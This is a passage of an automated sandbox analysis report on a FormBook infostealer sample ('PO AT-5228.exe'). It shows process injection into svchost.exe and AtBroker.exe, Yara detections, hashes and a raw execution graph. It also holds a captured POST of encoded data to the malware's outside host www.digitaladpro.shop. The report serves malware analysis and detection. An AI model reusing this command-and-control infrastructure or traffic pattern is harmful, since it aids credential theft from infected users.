                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:29:13.811515093 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:29:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.459122172.217.16.211802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:29:19.046355009 CET801OUTPOST /m6se/ HTTP/1.1
                                                                                      Host: www.digitaladpro.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.digitaladpro.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.digitaladpro.shop/m6se/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 4c 6b 31 53 70 32 36 79 42 64 58 45 46 32 6c 79 6b 67 4e 62 70 62 6c 6c 6e 6a 72 77 6b 6c 47 4f 41 65 76 46 31 6f 42 46 78 5a 61 33 66 57 38 45 74 42 4d 41 54 46 49 56 43 79 47 35 78 35 78 58 70 61 4e 59 72 6b 34 49 70 4f 47 63 58 37 67 54 54 42 6c 2f 76 68 34 56 52 6e 4b 67 42 51 73 54 47 42 58 4b 51 79 62 4a 2b 32 56 54 50 39 2b 43 78 68 73 6d 6e 76 73 32 69 45 70 6d 53 36 2f 6b 34 35 42 2f 66 61 63 77 6d 54 6f 4d 4b 6a 62 59 58 4d 4a 67 74 57 35 44 61 71 6d 70 4a 73 64 6c 4a 42 6b 6c 78 63 39 6e 78 6c 52 34 58 48 57 61 41 34 43 51 7a 67 3d 3d
                                                                                      Data Ascii: rP=grjygjBzNeYALk1Sp26yBdXEF2lykgNbpbllnjrwklGOAevF1oBFxZa3fW8EtBMATFIVCyG5x5xXpaNYrk4IpOGcX7gTTBl/vh4VRnKgBQsTGBXKQybJ+2VTP9+Cxhsmnvs2iEpmS6/k45B/facwmToMKjbYXMJgtW5DaqmpJsdlJBklxc9nxlR4XHWaA4CQzg==
                                                                                      Nov 13, 2024 09:29:19.904666901 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:29:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Server: ghs
                                                                                      Content-Length: 1566
                                                                                      X-XSS-Protection: 0
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                      Nov 13, 2024 09:29:19.904683113 CET537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                      Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:03:26:13
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\PO AT-5228.exe"
                                                                                      Imagebase:0xb60000
                                                                                      File size:1'175'040 bytes
                                                                                      MD5 hash:3DF965173D78ACBF95001CACCBEAA150
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:03:26:15
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\PO AT-5228.exe"
                                                                                      Imagebase:0x5c0000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:03:26:17
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe"
                                                                                      Imagebase:0xa80000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:3
                                                                                      Start time:03:26:19
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Windows\SysWOW64\AtBroker.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
                                                                                      Imagebase:0xde0000
                                                                                      File size:68'608 bytes
                                                                                      MD5 hash:D5B61959A509BDA85300781F5A829610
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:5
                                                                                      Start time:03:26:31
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe"
                                                                                      Imagebase:0xa80000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:8
                                                                                      Start time:03:26:48
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff6bf500000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.3%
                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                        Signature Coverage:5.1%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:48
                                                                                        execution_graph 93537 bd19dd 93542 b64a30 93537->93542 93539 bd19f1 93562 b80f0a 52 API calls __cinit 93539->93562 93541 bd19fb 93543 b64a40 __ftell_nolock 93542->93543 93563 b6d7f7 93543->93563 93547 b64aff 93575 b6363c 93547->93575 93554 b6d7f7 48 API calls 93555 b64b32 93554->93555 93597 b649fb 93555->93597 93557 b64b3d _wcscat Mailbox __NMSG_WRITE 93558 b64b43 Mailbox 93557->93558 93559 b661a6 48 API calls 93557->93559 93561 b664cf 48 API calls 93557->93561 93611 b6ce19 93557->93611 93558->93539 93559->93557 93561->93557 93562->93541 93617 b7f4ea 93563->93617 93565 b6d818 93566 b7f4ea 48 API calls 93565->93566 93567 b64af6 93566->93567 93568 b65374 93567->93568 93648 b8f8a0 93568->93648 93571 b6ce19 48 API calls 93572 b653a7 93571->93572 93650 b6660f 93572->93650 93574 b653b1 Mailbox 93574->93547 93576 b63649 __ftell_nolock 93575->93576 93697 b6366c GetFullPathNameW 93576->93697 93578 b6365a 93579 b66a63 48 API calls 93578->93579 93580 b63669 93579->93580 93581 b6518c 93580->93581 93582 b65197 93581->93582 93583 bd1ace 93582->93583 93584 b6519f 93582->93584 93586 b66b4a 48 API calls 93583->93586 93699 b65130 93584->93699 93588 bd1adb __NMSG_WRITE 93586->93588 93587 b64b18 93591 b664cf 93587->93591 93589 b7ee75 48 API calls 93588->93589 93590 bd1b07 _memcpy_s 93589->93590 93592 b6651b 93591->93592 93596 b664dd _memcpy_s 93591->93596 93595 b7f4ea 48 API calls 93592->93595 93593 b7f4ea 48 API calls 93594 b64b29 93593->93594 93594->93554 93595->93596 93596->93593 93714 b6bcce 93597->93714 93600 bd41cc RegQueryValueExW 93602 bd41e5 93600->93602 93603 bd4246 RegCloseKey 93600->93603 93601 b64a2b 93601->93557 93604 b7f4ea 48 API calls 93602->93604 93605 bd41fe 93604->93605 93720 b647b7 93605->93720 93608 bd423b 93608->93603 93609 bd4224 93610 b66a63 48 API calls 93609->93610 93610->93608 93612 b6ce28 __NMSG_WRITE 93611->93612 93613 b7ee75 48 API calls 93612->93613 93614 b6ce50 _memcpy_s 93613->93614 93615 b7f4ea 48 API calls 93614->93615 93616 b6ce66 93615->93616 93616->93557 93620 b7f4f2 __calloc_impl 93617->93620 93619 b7f50c 93619->93565 93620->93619 93621 b7f50e std::exception::exception 93620->93621 93626 b8395c 93620->93626 93640 b86805 RaiseException 93621->93640 93623 b7f538 93641 b8673b 47 API calls _free 93623->93641 93625 b7f54a 93625->93565 93627 b839d7 __calloc_impl 93626->93627 93628 b83968 __calloc_impl 93626->93628 93647 b87c0e 47 API calls __getptd_noexit 93627->93647 93631 b8399b RtlAllocateHeap 93628->93631 93633 b83973 93628->93633 93635 b839c3 93628->93635 93638 b839c1 93628->93638 93631->93628 93632 b839cf 93631->93632 93632->93620 93633->93628 93642 b881c2 47 API calls __NMSG_WRITE 93633->93642 93643 b8821f 47 API calls 6 library calls 93633->93643 93644 b81145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93633->93644 93645 b87c0e 47 API calls __getptd_noexit 93635->93645 93646 b87c0e 47 API calls __getptd_noexit 93638->93646 93640->93623 93641->93625 93642->93633 93643->93633 93645->93638 93646->93632 93647->93632 93649 b65381 GetModuleFileNameW 93648->93649 93649->93571 93651 b8f8a0 __ftell_nolock 93650->93651 93652 b6661c GetFullPathNameW 93651->93652 93657 b66a63 93652->93657 93654 b66643 93668 b66571 93654->93668 93658 b66adf 93657->93658 93660 b66a6f __NMSG_WRITE 93657->93660 93685 b6b18b 93658->93685 93661 b66ad7 93660->93661 93662 b66a8b 93660->93662 93684 b6c369 48 API calls 93661->93684 93672 b66b4a 93662->93672 93665 b66a95 93675 b7ee75 93665->93675 93667 b66ab6 _memcpy_s 93667->93654 93669 b6657f 93668->93669 93670 b6b18b 48 API calls 93669->93670 93671 b6658f 93670->93671 93671->93574 93673 b7f4ea 48 API calls 93672->93673 93674 b66b54 93673->93674 93674->93665 93677 b7f4ea __calloc_impl 93675->93677 93676 b8395c __crtLCMapStringA_stat 47 API calls 93676->93677 93677->93676 93678 b7f50c 93677->93678 93679 b7f50e std::exception::exception 93677->93679 93678->93667 93689 b86805 RaiseException 93679->93689 93681 b7f538 93690 b8673b 47 API calls _free 93681->93690 93683 b7f54a 93683->93667 93684->93667 93686 b6b1a2 _memcpy_s 93685->93686 93687 b6b199 93685->93687 93686->93667 93687->93686 93691 b6bdfa 93687->93691 93689->93681 93690->93683 93692 b6be0d 93691->93692 93696 b6be0a _memcpy_s 93691->93696 93693 b7f4ea 48 API calls 93692->93693 93694 b6be17 93693->93694 93695 b7ee75 48 API calls 93694->93695 93695->93696 93696->93686 93698 b6368a 93697->93698 93698->93578 93700 b6513f __NMSG_WRITE 93699->93700 93701 b65151 93700->93701 93702 bd1b27 93700->93702 93709 b6bb85 93701->93709 93704 b66b4a 48 API calls 93702->93704 93706 bd1b34 93704->93706 93705 b6515e _memcpy_s 93705->93587 93707 b7ee75 48 API calls 93706->93707 93708 bd1b57 _memcpy_s 93707->93708 93710 b6bb9b 93709->93710 93713 b6bb96 _memcpy_s 93709->93713 93711 bd1b77 93710->93711 93712 b7ee75 48 API calls 93710->93712 93712->93713 93713->93705 93715 b6bce8 93714->93715 93719 b64a0a RegOpenKeyExW 93714->93719 93716 b7f4ea 48 API calls 93715->93716 93717 b6bcf2 93716->93717 93718 b7ee75 48 API calls 93717->93718 93718->93719 93719->93600 93719->93601 93721 b7f4ea 48 API calls 93720->93721 93722 b647c9 RegQueryValueExW 93721->93722 93722->93608 93722->93609 93723 bd9bec 93727 b70ae0 _memcpy_s Mailbox 93723->93727 93724 b6ffe1 Mailbox 93726 b71526 Mailbox 93995 bacc5c 86 API calls 4 library calls 93726->93995 93727->93724 93727->93726 93749 b6ce19 48 API calls 93727->93749 93754 b6fec8 93727->93754 93758 b7f4ea 48 API calls 93727->93758 93760 bda706 93727->93760 93762 b997ed InterlockedDecrement 93727->93762 93783 b6fe30 93727->93783 93812 bafe7e 93727->93812 93851 b62a13 93727->93851 93854 bc0d1d 93727->93854 93857 bc0d09 93727->93857 93860 b62db5 93727->93860 93900 bb6ff0 93727->93900 93909 bbf0ac 93727->93909 93941 baa6ef 93727->93941 93947 bbe822 93727->93947 93988 bbef61 82 API calls 2 library calls 93727->93988 93730 b71473 93997 bacc5c 86 API calls 4 library calls 93730->93997 93731 b7146e 93737 b66eed 48 API calls 93731->93737 93734 b7f4ea 48 API calls 93734->93754 93736 bda246 93989 b66eed 93736->93989 93737->93724 93739 b70509 93998 bacc5c 86 API calls 4 library calls 93739->93998 93740 bda922 93744 b66eed 48 API calls 93744->93754 93745 bda873 93746 bda30e 93746->93724 93993 b997ed InterlockedDecrement 93746->93993 93747 b997ed InterlockedDecrement 93747->93754 93748 b6d7f7 48 API calls 93748->93754 93749->93727 93750 b80f0a 52 API calls __cinit 93750->93754 93752 bda973 93999 bacc5c 86 API calls 4 library calls 93752->93999 93754->93724 93754->93730 93754->93731 93754->93734 93754->93736 93754->93739 93754->93744 93754->93746 93754->93747 93754->93748 93754->93750 93754->93752 93757 b715b5 93754->93757 93769 b71d10 93754->93769 93987 b71820 335 API calls 2 library calls 93754->93987 93755 bda982 93996 bacc5c 86 API calls 4 library calls 93757->93996 93758->93727 93994 bacc5c 86 API calls 4 library calls 93760->93994 93762->93727 93770 b71d2a 93769->93770 93773 b71ed6 93769->93773 93771 b72357 93770->93771 93770->93773 93774 b71e0b 93770->93774 93782 b71eba 93770->93782 93771->93782 94003 ba9f44 58 API calls __gmtime64_s 93771->94003 93773->93771 93777 b71f55 93773->93777 93780 b71e9a Mailbox 93773->93780 93773->93782 93776 b71e47 93774->93776 93774->93777 93774->93782 93778 bdbfc4 93776->93778 93776->93780 93776->93782 93777->93780 93777->93782 94001 b997ed InterlockedDecrement 93777->94001 94000 b8203b 58 API calls __wtof_l 93778->94000 93780->93782 94002 b8203b 58 API calls __wtof_l 93780->94002 93782->93754 93784 b6fe50 93783->93784 93793 b6fe7e 93783->93793 93785 b7f4ea 48 API calls 93784->93785 93785->93793 93786 b7146e 93787 b66eed 48 API calls 93786->93787 93794 b6ffe1 93787->93794 93788 b71473 94007 bacc5c 86 API calls 4 library calls 93788->94007 93789 b6d7f7 48 API calls 93789->93793 93790 b71d10 59 API calls 93790->93793 93791 b70509 94008 bacc5c 86 API calls 4 library calls 93791->94008 93793->93786 93793->93788 93793->93789 93793->93790 93793->93791 93793->93794 93795 b66eed 48 API calls 93793->93795 93796 b7f4ea 48 API calls 93793->93796 93798 bda246 93793->93798 93804 b997ed InterlockedDecrement 93793->93804 93805 bda30e 93793->93805 93806 b80f0a 52 API calls __cinit 93793->93806 93808 bda973 93793->93808 93811 b715b5 93793->93811 94004 b71820 335 API calls 2 library calls 93793->94004 93794->93727 93795->93793 93796->93793 93800 b66eed 48 API calls 93798->93800 93799 bda922 93799->93727 93800->93794 93803 bda873 93803->93727 93804->93793 93805->93794 94005 b997ed InterlockedDecrement 93805->94005 93806->93793 94009 bacc5c 86 API calls 4 library calls 93808->94009 93810 bda982 94006 bacc5c 86 API calls 4 library calls 93811->94006 93813 bafea7 93812->93813 93814 bafe9c 93812->93814 93818 b6936c 81 API calls 93813->93818 93842 baff3a Mailbox 93813->93842 94041 b6d286 93814->94041 93816 b7f4ea 48 API calls 93817 baff5f 93816->93817 93819 baff6b 93817->93819 94051 b648ba 49 API calls 93817->94051 93820 bafeca 93818->93820 94010 b6936c 93819->94010 94046 b81dfc 93820->94046 93825 baff83 94030 b64550 93825->94030 93826 b6ce19 48 API calls 93827 bafef3 93826->93827 93830 b6518c 48 API calls 93827->93830 93833 baff01 93830->93833 93831 baffca 93838 bb0011 93831->93838 93839 bafff5 93831->93839 93832 baff96 GetLastError 93834 baffaf 93832->93834 93835 baff33 93833->93835 94049 ba6514 GetFileAttributesW FindFirstFileW FindClose 93833->94049 93850 baff43 Mailbox 93834->93850 94052 b6453b CloseHandle 93834->94052 93837 b6d286 48 API calls 93835->93837 93837->93842 93840 b7f4ea 48 API calls 93838->93840 93843 b7f4ea 48 API calls 93839->93843 93840->93850 93841 baff11 93841->93835 93846 baff15 93841->93846 93842->93816 93842->93850 93844 bafffa 93843->93844 94053 bc29e8 48 API calls _memcpy_s 93844->94053 94050 ba6318 52 API calls 3 library calls 93846->94050 93849 baff1e 93849->93835 93850->93727 93852 b635fe 2 API calls 93851->93852 93853 b62a1b 93852->93853 93853->93727 94139 bbf8ae 93854->94139 93856 bc0d2d 93856->93727 93858 bbf8ae 129 API calls 93857->93858 93859 bc0d19 93858->93859 93859->93727 93861 b6cdb9 48 API calls 93860->93861 93862 b62dcd 93861->93862 93864 b7f4ea 48 API calls 93862->93864 93867 bd5f6d 93862->93867 93865 b62ded 93864->93865 93868 b62dfd 93865->93868 94313 b648ba 49 API calls 93865->94313 93866 b62e22 93871 b6d286 48 API calls 93866->93871 93875 b62e31 93866->93875 93867->93866 94317 bb2113 48 API calls 93867->94317 93870 b6936c 81 API calls 93868->93870 93872 b62e0b 93870->93872 93873 bd5fb9 93871->93873 93874 b64550 56 API calls 93872->93874 93873->93875 93876 bd5fc1 93873->93876 93877 b62e1a 93874->93877 93878 b62a13 2 API calls 93875->93878 93879 b6d286 48 API calls 93876->93879 93877->93866 93877->93867 94316 b6453b CloseHandle 93877->94316 93880 b62e38 93878->93880 93879->93880 93881 b62e45 93880->93881 93882 bd5fd4 93880->93882 93884 b6d7f7 48 API calls 93881->93884 93885 b7f4ea 48 API calls 93882->93885 93886 b62e4d 93884->93886 93887 bd5fda 93885->93887 94290 b7e52c 93886->94290 93889 bd5ff3 93887->93889 94318 b7eb66 SetFilePointerEx ReadFile 93887->94318 93894 bd5ff7 _memcpy_s 93889->93894 94319 baa3e3 48 API calls _memset 93889->94319 93892 b62e5c 93892->93894 94314 b66b68 48 API calls 93892->94314 93895 b62e70 Mailbox 93896 b62eb0 93895->93896 93897 b64907 CloseHandle 93895->93897 93896->93727 93898 b62ea2 93897->93898 94315 b6453b CloseHandle 93898->94315 93901 b6936c 81 API calls 93900->93901 93902 bb702a 93901->93902 94363 b6b470 93902->94363 93904 bb705f 93907 b6cdb9 48 API calls 93904->93907 93908 bb7063 93904->93908 93905 bb703a 93905->93904 93906 b6fe30 335 API calls 93905->93906 93906->93904 93907->93908 93908->93727 93910 b6d7f7 48 API calls 93909->93910 93911 bbf0c0 93910->93911 93912 b6d7f7 48 API calls 93911->93912 93913 bbf0c8 93912->93913 93914 b6d7f7 48 API calls 93913->93914 93915 bbf0d0 93914->93915 93916 b6936c 81 API calls 93915->93916 93938 bbf0de 93916->93938 93917 b6c799 48 API calls 93917->93938 93918 b66a63 48 API calls 93918->93938 93919 bbf2cc 93920 bbf2f9 Mailbox 93919->93920 94418 b66b68 48 API calls 93919->94418 93920->93727 93922 bbf2b3 93924 b6518c 48 API calls 93922->93924 93923 b66eed 48 API calls 93923->93938 93926 bbf2c0 93924->93926 93925 bbf2ce 93927 b6518c 48 API calls 93925->93927 94416 b6510d 48 API calls Mailbox 93926->94416 93930 bbf2dd 93927->93930 93928 b6bdfa 48 API calls 93931 bbf175 CharUpperBuffW 93928->93931 94417 b6510d 48 API calls Mailbox 93930->94417 94405 b6d645 93931->94405 93933 b6bdfa 48 API calls 93934 bbf23a CharUpperBuffW 93933->93934 94415 b7d922 55 API calls 2 library calls 93934->94415 93937 b6936c 81 API calls 93937->93938 93938->93917 93938->93918 93938->93919 93938->93920 93938->93922 93938->93923 93938->93925 93938->93928 93938->93933 93938->93937 93939 b6510d 48 API calls 93938->93939 93940 b6518c 48 API calls 93938->93940 93939->93938 93940->93938 93942 baa6fb 93941->93942 93943 b7f4ea 48 API calls 93942->93943 93944 baa709 93943->93944 93945 baa717 93944->93945 93946 b6d7f7 48 API calls 93944->93946 93945->93727 93946->93945 93948 bbe868 93947->93948 93949 bbe84e 93947->93949 94423 bbccdc 48 API calls 93948->94423 94422 bacc5c 86 API calls 4 library calls 93949->94422 93952 bbe871 93953 b6fe30 334 API calls 93952->93953 93954 bbe8cf 93953->93954 93955 bbe96a 93954->93955 93957 bbe916 93954->93957 93980 bbe860 Mailbox 93954->93980 93956 bbe978 93955->93956 93960 bbe9c7 93955->93960 94442 baa69d 48 API calls 93956->94442 94424 ba9b72 48 API calls 93957->94424 93959 bbe949 94425 b745e0 93959->94425 93963 b6936c 81 API calls 93960->93963 93960->93980 93965 bbe9e1 93963->93965 93964 bbe99b 94443 b6bc74 48 API calls 93964->94443 93967 b6bdfa 48 API calls 93965->93967 93969 bbea05 CharUpperBuffW 93967->93969 93968 bbe9a3 Mailbox 94444 b73200 93968->94444 93971 bbea1f 93969->93971 93972 bbea72 93971->93972 93973 bbea26 93971->93973 93974 b6936c 81 API calls 93972->93974 94470 ba9b72 48 API calls 93973->94470 93975 bbea7a 93974->93975 